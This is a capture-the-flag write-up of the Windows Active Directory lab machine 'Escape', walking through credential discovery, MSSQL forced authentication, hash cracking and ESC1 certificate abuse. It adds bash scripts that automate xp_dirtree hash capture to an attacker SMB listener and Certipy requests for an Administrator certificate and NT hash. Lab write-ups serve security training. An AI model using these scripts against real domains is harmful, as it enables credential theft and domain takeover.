Last updated
Escape is a Medium difficulty Windows Active Directory machine that starts with an SMB share from which guest-authenticated users can download a sensitive PDF file. Inside the PDF are temporary credentials for the MSSQL service running on the machine. An attacker can force the MSSQL service to authenticate to their own machine and capture the hash. The service runs under a user account and the hash is crackable. With a valid set of credentials the attacker gets command execution on the machine over WinRM. Enumerating the machine, a log file reveals the credentials of the user ryan.cooper.
Further enumeration reveals that a Certificate Authority is present and that one certificate template is vulnerable to ESC1, meaning that users eligible to enrol in this template can request certificates for any other user in the domain, including Domain Administrators. By exploiting ESC1, the attacker obtains a valid certificate for the Administrator account and uses it to retrieve the Administrator's hash.
Nmap Scan
Summary
hosts file
Kerberos Enumeration
I started my enumeration by brute-forcing Kerberos, since there is no web server here and I need a domain account to attack the box, but had no luck.
SMB & RPC Enumeration
I then moved on to the SMB and RPC services, looking for misconfigured share permissions or RPC access. I found I had READ access on the Public share and no access to RPC.
I connected to the share and downloaded a PDF file from it.
After opening the file, I noticed there are credentials at the end of it.
I can access the database with these creds :))
When I deal with MSSQL, I run through a checklist of possible attack paths, so I will go through it here:
Check for admin (sysadmin) access
Check the databases for juicy info and secrets
Check the possibility of capturing the MSSQL service account's hash
Check for impersonating other users
Check for TRUSTWORTHY databases
Check for linked servers
Check for read or write access to the file system
Check for executing commands with xp_cmdshell
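The checklist above, as an added example that is not part of the original writeup: one T-SQL query per item, replayed through impacket's mssqlclient.py, with the forced-authentication item last so that an SMB listener (impacket's smbserver.py) is already up when xp_dirtree fires, and a helper that pulls the captured NetNTLMv2 line into the form hashcat mode 5600 expects. The target host, the PDF credentials and the attacker VPN address are placeholders read from the environment; none of those values, nor the service account name used in the usage note, come from the writeup.

```bash
#!/usr/bin/env bash
# Added example, not the writeup's own code: the MSSQL checklist as T-SQL,
# replayed with impacket's mssqlclient.py, plus capture/extraction of the
# NetNTLMv2 hash that xp_dirtree leaks to our SMB listener.
# Assumed (not from the writeup): TARGET, MSSQL_USER/MSSQL_PASS (the PDF creds)
# and ATTACKER_IP are supplied via the environment.
set -euo pipefail

TARGET="${TARGET:-}"
MSSQL_USER="${MSSQL_USER:-}"
MSSQL_PASS="${MSSQL_PASS:-}"
ATTACKER_IP="${ATTACKER_IP:-}"

# Write one query per checklist item into a file that mssqlclient.py -file replays
# line by line. Numbers refer to the checklist items; item 3 goes last on purpose.
write_checklist_sql() {
  local out="$1" attacker_ip="$2"
  cat > "$out" <<EOF
-- 1. Do we already hold sysadmin?
SELECT SYSTEM_USER AS login_name, IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;
-- 2. Databases worth digging into for secrets
SELECT name FROM sys.databases;
-- 4. Logins we are allowed to impersonate (EXECUTE AS LOGIN = '...')
SELECT DISTINCT b.name AS impersonable FROM sys.server_permissions a JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';
-- 5. TRUSTWORTHY databases (db_owner there can escalate to sysadmin)
SELECT name FROM sys.databases WHERE is_trustworthy_on = 1;
-- 6. Linked servers
EXEC sp_linkedservers;
-- 7. File system reachability (xp_fileexist needs fewer rights than reading a file)
EXEC master..xp_fileexist 'C:\\Windows\\win.ini';
-- 8. Is xp_cmdshell already enabled?
SELECT name, value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell';
-- 3. Force the service account to authenticate to our SMB listener (NetNTLMv2 capture)
EXEC master..xp_dirtree '\\\\${attacker_ip}\\share', 1, 1;
EOF
}

# Run this in a second terminal before replaying the checklist (port 445 needs root).
start_smb_listener() {
  sudo smbserver.py -smb2support share "$(mktemp -d)" | tee smbserver.log
}

# Replay the checklist against the target with the PDF credentials.
# Add -windows-auth after the target if the credentials are a domain account
# rather than a SQL login.
run_checklist() {
  local sqlfile
  sqlfile="$(mktemp)"
  write_checklist_sql "$sqlfile" "$ATTACKER_IP"
  mssqlclient.py "${MSSQL_USER}:${MSSQL_PASS}@${TARGET}" -file "$sqlfile"
}

# Pull the NetNTLMv2 line(s) out of smbserver.py or Responder output. The
# user::domain:challenge:ntproof:blob shape is exactly what hashcat -m 5600 takes.
extract_ntlmv2() {
  grep -oE '[^[:space:]]+::[^[:space:]:]+:[0-9A-Fa-f]{16}:[0-9A-Fa-f]{32}:[0-9A-Fa-f]+' "$1" | sort -u
}

# Crack whatever the listener caught. The hash belongs to the account the SQL
# service runs as, not to the SQL login we connected with.
crack_ntlmv2() {
  extract_ntlmv2 "$1" > ntlmv2.hash
  hashcat -m 5600 ntlmv2.hash /usr/share/wordlists/rockyou.txt
}
```

Order of operations: `start_smb_listener` in one terminal, `run_checklist` in another, then `crack_ntlmv2 smbserver.log`. xp_dirtree is callable by any login, which is why the forced authentication works even though the PDF account has no special rights.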
Nothing interesting so far, but I got the hash of the service account by making it authenticate to a local SMB server.
The hash is cracked successfully
I can also access the database with the new account.
The account doesn't have any special permissions, so I will move on to WinRM.
Under C:\SQLServer\Logs there is a .bak file containing the log of the MSSQL instance. What is interesting is a failed login attempt by Ryan.Cooper, with the string NuclearMosquito3 appearing alongside it. Maybe I can use this string as a password.
And the password is correct :))
I accessed the machine as Ryan and found he is a member of Certificate Service DCOM Access.
Since this group exists, I need to enumerate the PKI of the domain. A CA named sequel-DC-CA is found in the domain.
Then I looked for vulnerable templates, i.e. possible escalation paths (ESC).
The UserAuthentication template is vulnerable to ESC1, which means I can request a certificate with an alternative principal name (UPN) of my choosing, including the Administrator's.
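The ESC1 abuse as an added example using Certipy, not the writeup's own commands. The CA name sequel-DC-CA and the template UserAuthentication come from the writeup; the domain name sequel.htb, the DC hostname dc.sequel.htb, the DC address and Ryan's password are assumptions supplied through the environment. The last function parses the output of `certipy auth` so the recovered NT hash can be passed straight to a pass-the-hash tool.

```bash
#!/usr/bin/env bash
# Added example, not the writeup's own code: ESC1 against the UserAuthentication
# template with Certipy. Assumed (not from the writeup): DOMAIN, DC_HOST, DC_IP
# and RYAN_PASS are set in the environment.
set -euo pipefail

DOMAIN="${DOMAIN:-sequel.htb}"   # assumed domain name
DC_HOST="${DC_HOST:-dc.sequel.htb}"  # assumed DC / CA host
DC_IP="${DC_IP:-}"
RYAN_PASS="${RYAN_PASS:-}"
USER="ryan.cooper@${DOMAIN}"

# 1. Confirm the finding. Certipy flags ESC1 when a template lets the enrollee
#    supply the subject, carries a client-authentication EKU, needs no manager
#    approval and is enrollable by a low-privileged group.
find_vulnerable_templates() {
  certipy find -u "$USER" -p "$RYAN_PASS" -dc-ip "$DC_IP" -vulnerable -stdout
}

# 2. Request a certificate from the vulnerable template with the Administrator
#    UPN in the SAN. Certipy saves it as administrator.pfx.
request_admin_cert() {
  certipy req -u "$USER" -p "$RYAN_PASS" -dc-ip "$DC_IP" -target "$DC_HOST" \
    -ca sequel-DC-CA -template UserAuthentication \
    -upn "administrator@${DOMAIN}"
}

# 3. PKINIT with the certificate: Certipy obtains a TGT for Administrator and
#    then recovers the NT hash via U2U. Kerberos rejects a client whose clock is
#    more than 5 minutes off from the DC, so sync first (ntpdate is one option).
auth_as_admin() {
  sudo ntpdate "$DC_IP" || true
  certipy auth -pfx administrator.pfx -dc-ip "$DC_IP" | tee certipy-auth.log
}

# Extract the NT hash from the "Got hash for '<user>': LM:NT" line that
# certipy auth prints, so it can go into evil-winrm -H / psexec -hashes.
nt_hash_from_certipy() {
  sed -nE "s/.*Got hash for '[^']+': [0-9a-f]{32}:([0-9a-f]{32}).*/\1/p" "$1"
}

# Whole chain, run manually step by step in practice:
#   find_vulnerable_templates && request_admin_cert && auth_as_admin
#   nt_hash_from_certipy certipy-auth.log
```

With the hash in hand, `evil-winrm -i "$DC_IP" -u administrator -H "$(nt_hash_from_certipy certipy-auth.log)"` gives a shell as Administrator; the saved administrator.ccache also works directly with any Kerberos-aware impacket tool via `KRB5CCNAME`.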
Root Flag: 6ecb67c8db147ac353xxxxxxxxxxxxxxx